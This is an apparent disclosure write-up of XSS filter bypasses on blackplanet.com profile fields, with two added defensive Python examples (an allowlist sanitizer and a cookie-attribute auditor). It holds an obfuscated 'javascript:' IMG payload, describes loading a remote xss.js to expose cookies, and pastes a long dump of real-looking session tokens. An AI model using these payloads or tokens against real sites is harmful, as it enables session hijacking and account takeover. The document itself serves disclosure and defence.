Blackplanet.com

Homepage:
http://www.blackplanet.com

Affected files:
input boxes for editing your profile.
=0D
Bypassing blackplanet.com's filters wasn't very hard; they even give a list of acceptable HTML tags, some of which included: div, base, bgsound, body, br, embed, img and others.

The list of allowed HTML tags is here:

http://www.blackplanet.com/help/describe_html_level_popup.html?html_level=50
=0D
=0D
My first attempt was a tag, and below are several ways to create our XSS example. For this first one, make sure the tab character is actually there, between "jav" and "ascript":

[IMG SRC="jav ascript:alert('XSS');"]
=0D
Screenshots:
http://www.youfucktard.com/xsp/bp1.jpg
http://www.youfucktard.com/xsp/bp2.jpg

-------------------------
=0D
Here we are using extraneous open brackets to bypass the filter for the disallowed tags.

Screenshots:

http://www.youfucktard.com/xsp/blackp3.jpg
http://www.youfucktard.com/xsp/blackp4.jpg
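Both bypasses above (the tab inside "javascript:" and the extra open brackets) defeat filters that match on strings. As an added example that is not part of the original post, here is a Python allowlist sanitizer built on the standard-library HTML tokenizer: it strips the whitespace and control characters browsers ignore from URL attribute values before checking the scheme, and it rebuilds the output from allowlisted tags and attributes instead of trying to spot bad tags in the raw text. The tag and attribute allowlists and the sample inputs are hypothetical choices made for this example, not blackplanet.com's list.

```python
"""Added example (not from the original post): an allowlist HTML sanitizer
built on a real tokenizer.

  * "jav<TAB>ascript:" passes a filter that looks for the literal string
    "javascript:"; browsers ignore ASCII whitespace/control characters
    inside the scheme, so the check must strip them first.
  * extra "<" characters around a tag confuse a string/regex filter, while
    a browser still finds the tag; tokenizing the markup the way a browser
    does and re-emitting only allowlisted tags removes the ambiguity.
"""
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit

ALLOWED_TAGS = {"b", "i", "p", "br", "img", "a"}          # hypothetical allowlist
ALLOWED_ATTRS = {"img": {"src", "alt"}, "a": {"href"}}    # per-tag attribute allowlist
URL_ATTRS = {"src", "href"}                               # attributes that hold URLs
ALLOWED_SCHEMES = {"http", "https"}                       # no javascript:, data:, vbscript:
VOID_TAGS = {"br", "img"}                                 # never emit a closing tag
DROP_CONTENT = {"script", "style"}                        # drop the element body as well


def normalise_url(value):
    """Remove ASCII control characters and whitespace (0x00-0x20) that browsers
    tolerate inside a URL scheme, e.g. "jav<TAB>ascript:" -> "javascript:"."""
    return "".join(ch for ch in value if ord(ch) > 0x20)


def url_is_safe(value):
    """True if the URL is relative (no scheme) or uses an allowlisted scheme."""
    try:
        scheme = urlsplit(normalise_url(value)).scheme.lower()
    except ValueError:            # malformed URL, e.g. unbalanced IPv6 brackets
        return False
    return scheme == "" or scheme in ALLOWED_SCHEMES


class Sanitizer(HTMLParser):
    """Tokenizes input like a browser and rebuilds it from the allowlists."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.skipping = None      # name of the DROP_CONTENT element we are inside

    def handle_starttag(self, tag, attrs):
        if tag in DROP_CONTENT:
            self.skipping = tag
            return
        if self.skipping or tag not in ALLOWED_TAGS:
            return                # drop the tag; its text is still kept via handle_data
        kept = []
        for name, value in attrs:  # HTMLParser has already decoded &#58; and friends
            value = value or ""
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue          # e.g. onerror, onload, style
            if name in URL_ATTRS and not url_is_safe(value):
                continue          # e.g. src="jav<TAB>ascript:..."
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag == self.skipping:
            self.skipping = None
        elif not self.skipping and tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skipping:
            self.out.append(escape(data, quote=False))   # a stray "<" becomes &lt;


def sanitize(fragment):
    """Return the fragment rebuilt from allowlisted tags, attributes and URLs."""
    parser = Sanitizer()
    parser.feed(fragment)
    parser.close()
    return "".join(parser.out)


if __name__ == "__main__":
    # Constructed inputs mirroring the two bypass shapes discussed in the post.
    for sample in ('<img src="jav\tascript:alert(\'XSS\');">',
                   '<<img src="x" onerror="alert(1)">>'):
        print(repr(sample), "->", repr(sanitize(sample)))
```

The important design choice is that nothing is ever "removed" from the input: the parser tokenizes it and the output is built only from what the allowlists permit, so a filter-evasion trick has to fool the tokenizer itself rather than a pattern that runs ahead of it.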
=0D
----------------------------
=0D
Using the same example as above, now to reveal our cookie data, and OMG this cookie is huge!:

<<<

Screenshots:
http://www.youfucktard.com/xsp/blackp5.jpg
http://www.youfucktard.com/xsp/blackp6.jpg

If I were to scroll down further you would see the cookie even goes down there! Here's the whole thing cut and pasted:
=0D
This is remote text via xss.js located at ha.ckers.org CP=null*; user_session=09debbe7384762ba06bed4518ca44547d1b6b930-3745-FT41BxYIw4g%3D-Bp9z2S9CCgDykaoD2E3KySJHEma3H722rbhB%2FfVyBSWw25VyfO070qhSLqh%2FROfkj8XcUfDUJyixibp7nFWYCNFtLY7Fs3yet%2B1cFaP319XAw998Xj3LFPH352JxbWKuNuKH4O4vkosEdYVlPfpWwvkvV5T5wRFu8wrDr6i2V%2BHf8wizsIqneVJF6I7zmf7yCwUxI%2F74pEUXk8Ag%2By2fbmhJLnUDUdkpKP85hSEJaluXkVRRullzAdmG30u0xNS3jx6tKa1lOldJGQ8%2F6UOkN3zaQdVBI8VPx6%2Fj4HJlv9hSm6ZUdooVxXe4A930PDJEViGWaHZMPodJUa2r2H1C5%2Fk4l%2F0rVHumYEd06ys6pOaHD0JMCVp3pgAZ%2FaVBG7wQ0xw1Nn388FQtC%2FHbd%2B195uIjapAVaoars10I3NA1NGjaUnUTk5bUhs3I5bpVuk9w0S0KlBbzO0wEhbQ7GcqntQGQG86czsC08%2BFz3lyPGynFDOkgiYfjyaukLGSChB%2BA8oX6yb047ilQOnuN15bZXJUBVVsA4t6l%2BTEUL5c8bwANnZMY85Xdm2mTsBTEn0ohVJqE5vB3KsH%2BLluNZe8VOx34pOYSoXHIsXjfHS1VDtZX0lj4lp58a0Bn%2FGjhtcAFmeut99HfJfxEHqRQUq6L448AHeDvM07O%2BHF0I11WbkR1BakrP2FqjjfJT42FQm7mzWRGw3i4CMSNNJSe0ZQTueBDISA86rbjt8f8iLpts0PNA5A2Fjf222Bj8hINQdPTJ7GAXWX9HVifw4rpYIc0TxTSOYlb3wqvnpJsZ5wm09uRg5Iq8CegPsI6SDtHguWsVFIJxSnQseUWgBB2Ffxdi4XqKvblVX0iISq5zL6NTgKxYtqBns%2Fp0BNfZoQ7zcSA5G2Te0T0U9yF4gHjikMg85o79OQJk%2BY5bDR2czIOeBfML8heHi7LjJ192CLwvfJPvnr%2FTxngD3BnsLWnGqg8%2FWk%2Bj9iOMvsGap1%2BPCTMXFGekArvm67VawC1HwjFsNSZxVKQct23MmAoBEfbe49bE1DoSKxnZ3Xb2uncIQ4nD1EM%2Bk7WoI5JL9weRvA2D99HP0jm7mFV%2Fdb2wqgXX0gNjHvUVUu%2BEiKUuoZajbRgNPfaFS4qg%2FrgTVrGeDUYRDcXGeO8vTCwmJL5Fb2eMyAHrfnddWPcTHGhophW1WOciLQyjtsuaofWeVyOje9q13TCEcyaR23liIZ9npPX9xqrRkL8mg0pYAGf%2FjLomHMudVP%2BqmQ1H7PONnnddtRpRxWqVtPnJI6ZjVlYOn8cPeKtbksmJncSpY3wdH2h8zZMyoNLJekVm2ZQ1zNeycfmjytAI1j; ads_session=667cf3b62081116a981955041ccb3e0de279dd96-498-xFpEhAqQwl4%3D-QABXjDDBlYf%2BdzX1lIfiDn5wS9cQSA85zzVHxKsmHh5sHhhP9WmjmVaTutX9bxsoB4bZ6lA85wiF2I8%2BCoJwJFN02GS4SRLa3qssYSk1PSjKhHHvXOMPaFrMewVpserex4xd1EoutRKSWjLQMLee2yIOcEi4FwMlwk5Jm2y0IleZZXfeJ3XSRe9UEfJspR8naEg9VG9JMug5%2Bt1QY9oH7qEl6VlliWfhX5gIpA%2BsQFx2tapvMR6rPuK7I3z2w3HRsnf%2BtNqmqPmuYVpXvIO4rp8Ka5rcazOkOhmAb43ypQmuKuHfAfWFxeAEaD2TjZkhrLp9xeTudF4OLn6t%2BTWxsnC1kY7sTJs%3D; jb_session=2e915e5c518f7b117b483bfe3328a63aec581681-4195-Ohd5Eic2jus%3D-7ReNlr3fxxd23LQ0f2UFYy7hT6NN%2FDxVdQR4sX2xUblU%2FQ56zYZgTyNs8zzFrk8ypVtDTdAqDuf0EoTFhoAB6tJNxc%2B0jl6%2FH4kbjo70T%2FRSLtrwDaAgIuBlDN2RHbq9CGT2JU7MCWansv8TG2sUifpebrT%2Bn9EQD%2BwHPtmRq9hS1SZ6oJtmApkVIMhg0sGdfvanZaCDDXbn%2FZTunVwwh6bvy%2B1Du%2FumeV09GvdGHWvBnvFLNZfI0W%2Fkdk3Kzn%2F9EfntLKm6wXNCSbQtoQRqudhbasGzCTL%2Buo9T6ALOUpXSco2nhW8WDPjmLCsKFBBVafH5I8XMgqwhjOJqv9WYt37aZnzkIqRS12pv9QfZoIORxGBNInp5PYoBE%2FmBMxg5lV%2BBOLgQPvmBzPOW8WB3ntP30sWTcItA29s%2BQtlBZvnHPIvsbGEXBSytYAYrijXbiu91mI9gGkUDtopybWfN4fpgSdpwAsGg2BdXbdjRpLUAIs6ukq%2FZduxS8QVqEuU7QSN6GLDPiqHkJMLi8AIjsC5fASDrCSlk4FwSy7xuGmBEbhEqJcyo9e0RhUFlnuvWLxF%2BjBQNHsItuQxFoXsqheZ68zrOsM%2F%2FHGXSRAyk3nv3nSdOK02z3jOhZvhgH%2Fcxn3btl1O5PZ2xgMpyo9b9NGaVERDqWEa%2FysG9EGLma7LsIFqsexuqeOs%2BkCpbDhQWdCIgV04vkz6EzjFHWQyXZcefnZMRBs5%2BCj5OM4kldvrYPznVIp09FEEbPG%2F9w%2Bfm3c7n1inOhve1lDD8kbqdMB674oX6p8uJGxNtRMBPo4%2FLsj0Yr2iZL2pRu0PyI6s6JCydIRvDvFLrPCKFLsQPkUguqUKTLG4poSumO3ELl597nAV6%2FdR1o1bnSty8M1M%2BGjQk7nQon7yf4H9VIvE6Uh7bQ%2FF%2FMTQJStNkw%2Be2%2FrikcMvWe0Z91OlPDWZ5I9rTizkkED8P8lc%2BJ%2FaWs2jhgHTU7ZHsl%2BKBjRwXt5Sj71bCMlVWD7q7vVCnr8Gulz%2BznlYLo7TE3dpeofK3Pj5u9DBOONsU8QV%2B%2B18c6zhtCuLoiQutSAPT2%2FcqbY7Wasj03qspiYwvkhDJ9Ex43xk8OcsxcM2JEEweHcyHOXnj%2FASSDt3iJlsztTdaDuafpON%2FhM9%2BshyM%2BuMnTcWQfhRYn4Uf8NZO2PL4xmf6PgdNBThwSeX%2BnTahPKfgPfUZaNYGEpVqSezzbPxXWck%3D; al_session=45c785b4e8aab0915123c7ec4f6c97fb2c220454-1361-ynYOQkoacpk%3D-ekkHZhJFQOi8Dzk%2BDGYylCTo7Bl7LVxLyO3Ek%2FfluSUCMeA5IWNrxezMrrw8r9rjnQHeu3uI7Uh9D%2F2v16Pmi6THOKRBmPR6r9aRK%2BnQ3jGIT%2BU0hhtVp3%2FAUi4UZOeFkoXlnL3m90W3nPjVCfrqTmMTTBMuu5p5DTbmcVp7mWgpj70BVsm7USVgbjpOpFhHMsmAQIS%2FjGhm%2Bgi5kH7s2FYZj3VtdStmIpw7q5jeqwnOR72ySKefFiJQsMUTqT0k1%2FG9FuvyTQrpDgN78KKprok2TYWCBJZIBHQj62I11nqTrefFw41tmFDDLMrnu4ka18wZykVrsX37S4ls77WD9pfdhAX3QK8mr5fmLvKIt%2BgURp1sXiT2Bh6qmmxOOhi0B2B5V3A0D7w7JvTVjbUi8fmyjaCbpIkWyKk3xM8Ug%3D%3D
=0D
We notice the cookie above tracks:

user_session
ads_session
jb_session
al_session

Well, there you have it, a few ways to bypass blackplanet.com's filters to create an XSS vuln and even disclose cookie data.
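The dump above is exactly what a script can read from document.cookie when session cookies are set without the HttpOnly attribute. As an added example, not from the original post, here is a small Python checker for Set-Cookie headers alongside a helper that emits the hardened form using the standard library's http.cookies module. The cookie names follow the post; the values and the weak headers are constructed placeholders.

```python
"""Added example (not from the original post): audit Set-Cookie headers for
the attributes that keep a session cookie out of document.cookie and off
plain-HTTP and cross-site requests, and build a correctly attributed one."""
from http.cookies import SimpleCookie

# Constructed Set-Cookie headers (placeholder values) with no HttpOnly,
# Secure or SameSite attribute, which is what a document.cookie dump like
# the one in the post implies.
WEAK_HEADERS = [
    "user_session=EXAMPLE_USER_SESSION_VALUE; Path=/",
    "ads_session=EXAMPLE_ADS_SESSION_VALUE; Path=/",
]


def audit_set_cookie(header):
    """Return a list of missing protections for one Set-Cookie header value."""
    jar = SimpleCookie()
    jar.load(header)            # parses "name=value; Attr; Attr=val" into a Morsel
    findings = []
    for name, morsel in jar.items():
        if not morsel["httponly"]:
            findings.append(f"{name}: missing HttpOnly (readable via document.cookie, "
                            f"so an XSS payload can exfiltrate it)")
        if not morsel["secure"]:
            findings.append(f"{name}: missing Secure (sent over plain HTTP)")
        if not morsel["samesite"]:
            findings.append(f"{name}: missing SameSite (sent on cross-site requests)")
    return findings


def hardened_cookie(name, value, path="/"):
    """Build a Set-Cookie value carrying the attributes a session cookie needs."""
    jar = SimpleCookie()
    jar[name] = value
    morsel = jar[name]
    morsel["path"] = path
    morsel["secure"] = True      # only over HTTPS
    morsel["httponly"] = True    # not exposed to document.cookie
    morsel["samesite"] = "Lax"   # not attached to cross-site subrequests
    return morsel.OutputString()


if __name__ == "__main__":
    for header in WEAK_HEADERS:
        print(header)
        for finding in audit_set_cookie(header):
            print("   ", finding)
    print(hardened_cookie("user_session", "EXAMPLE_USER_SESSION_VALUE"))
```

HttpOnly does not fix the XSS itself (the injected script still runs as the victim), but it removes the cookie-theft outcome the screenshots show, which is why it belongs on every session cookie regardless of how good the HTML filter is.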